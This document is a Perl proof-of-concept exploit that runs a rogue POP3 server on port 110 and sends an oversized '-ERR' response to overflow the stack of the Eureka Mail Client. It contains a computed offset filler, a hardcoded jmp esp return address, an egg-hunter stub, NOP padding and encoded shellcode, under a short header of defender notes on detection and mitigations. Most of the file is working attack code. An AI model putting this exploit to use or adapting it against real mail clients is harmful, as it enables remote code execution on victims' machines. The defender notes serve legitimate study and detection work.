# Proof-of-concept rogue POP3 server. It listens on tcp/110 and answers every
# client that connects with an oversized "-ERR" line, built to overwrite a saved
# return address in the Eureka Mail Client named in the messages below.
# Defender notes:
#  * RFC 1939 limits a POP3 response line to 512 octets including CRLF. The
#    line sent here is over a kilobyte with the values shown, so a length check
#    on POP3 server responses is a workable detection.
#  * The layout relies on a fixed address inside a system DLL and on code
#    running from the stack. NOTE(review): presumably ASLR and DEP on the
#    client host break both assumptions; confirm for the build in use.
- use Socket;
- #Local IP or hostname that the mail client uses as its POP3 server.
- #Its length is subtracted from the filler below, so per the author
- #the value must match the client's setting exactly.
- my $localserver = "10.0.1.6";
- #Filler up to the saved return address (author's offset to EIP): 723 bytes minus the server-name length.
- my $junk = "A" x (723 - length($localserver));
- my $ret = pack('V',0x7E47BCAF); #packed as a little-endian 32-bit value; author: jmp esp in user32.dll
- my $padding = "\x90" x 300; #300 NOP (0x90) bytes placed between the egg hunter and the tagged payload
- my $egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
- "w00t". #4-byte marker embedded in the hunter stub; the payload below is prefixed with it twice
- "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
- # The author labels the bytes below as message-box shellcode; they are opaque here and not verified.
- my $shellcode = ("\x33\xc9\xba\x8d\x4c\x87\x06\xdb\xde\xd9\x74\x24\xf4\xb1\x45".
- "\x5f\x31\x57\x13\x03\x57\x13\x83\xef\xfc\xe2\x78\x95\x6c\x9d".
- "\x5b\x52\x57\x56\x6a\x49\x25\xe1\xbd\xa4\x2e\x85\xcc\x06\x24".
- "\xef\x22\xec\x4c\x0c\xb1\xb4\xb8\xa7\xbb\x18\x32\x81\x7b\x16".
- "\x5c\x9b\x88\xf1\x5d\xb2\x91\xe3\x3e\xbf\x01\xc0\x9a\x34\x9c".
- "\x34\x68\x1e\x36\x3d\x6f\x75\xcd\xf7\x77\x02\x8b\x27\x89\xff".
- "\xc8\x1c\xc0\x74\x3a\xd6\xd3\x64\x73\x17\xe2\xb8\x8f\x4b\x81".
- "\xf9\x1b\x93\x4b\x36\xee\x9a\x8c\x22\x04\xa7\x6e\x91\xcc\xad".
- "\x6f\x52\x56\x6a\x71\x8e\x00\xf9\x7d\x1b\x47\xa7\x61\x9a\xbc".
- "\xd3\x9e\x17\x43\x0c\x17\x63\x67\xd0\x49\xaf\xd5\xe0\xa0\xfb".
- "\x90\x14\x3b\xc1\xca\x58\x72\xc8\xe6\x37\x63\x4b\x09\x48\x8c".
- "\xfd\xb0\xb3\xc8\x80\xe2\x5e\x5d\xfa\x0e\xbb\xf0\xec\xa0\x3c".
- "\x0b\x13\x35\x87\xfc\x84\x29\x64\xdd\x15\xd9\x47\x2f\xb8\x7d".
- "\xc0\x3a\xb7\x18\x62\x4d\x6b\xc6\x88\xc4\x72\x50\x72\x83\x7e".
- "\xd5\x4e\x7c\xc4\x4d\xec\x30\x86\x0a\xed\xee\xa4\xfc\x6f\x10".
- "\xb7\x03\x07\xb6\x68\xdb\xf8\x2e\x0d\x68\x9c\xcd\xa5\xe1\x37".
- "\x66\x53\x95\xbf\xf5\xeb\x09\x71\x21\x83\x8d\x55\xd9\x1d\xce".
- "\xfe\x95\x64\x31\xa7\x3d\xf4\x44\x25\xd7\x92\xc2\xe9\x54\x06".
- "\x62\x85\xf3\xbc\x17\x31\x7c\x4e\xa7\xad\x4d\x79\xcf\x62\x8a".
- "\x6a\x46\x9b\xe3\x5e\x0a\x0f\x55\x0d\x55\x7f\x64\x71\xf9\x7f".
- "\xd2\x79");
- my $payload=$junk.$ret.$egghunter.$padding."w00tw00t".$shellcode; #order: filler, return address, egg hunter, NOP padding, doubled tag, shellcode
- #Listen on tcp/110 (POP3) on all interfaces. NOTE(review): the results of socket/bind/listen are not checked.
- my $port=110;
- my $proto=getprotobyname('tcp');
- socket(SERVER,PF_INET,SOCK_STREAM,$proto);
- my $paddr=sockaddr_in($port,INADDR_ANY);
- bind(SERVER,$paddr);
- listen(SERVER,SOMAXCONN);
- print "[+] Listening on tcp port 110 [POP3]... \n";
- print "[+] Configure Eureka Mail Client to connect to this host\n";
- my $client_addr;
- while($client_addr=accept(CLIENT,SERVER)) #one pass per inbound connection
- {
- print "[+] Client connected, sending evil payload\n";
- while(1) #no exit condition: the same -ERR line is written repeatedly
- {
- print CLIENT "-ERR ".$payload."\n";
- print " -> Sent ".length($payload)." bytes\n";
- }
- }
- close CLIENT;
- print "[+] Connection closed\n";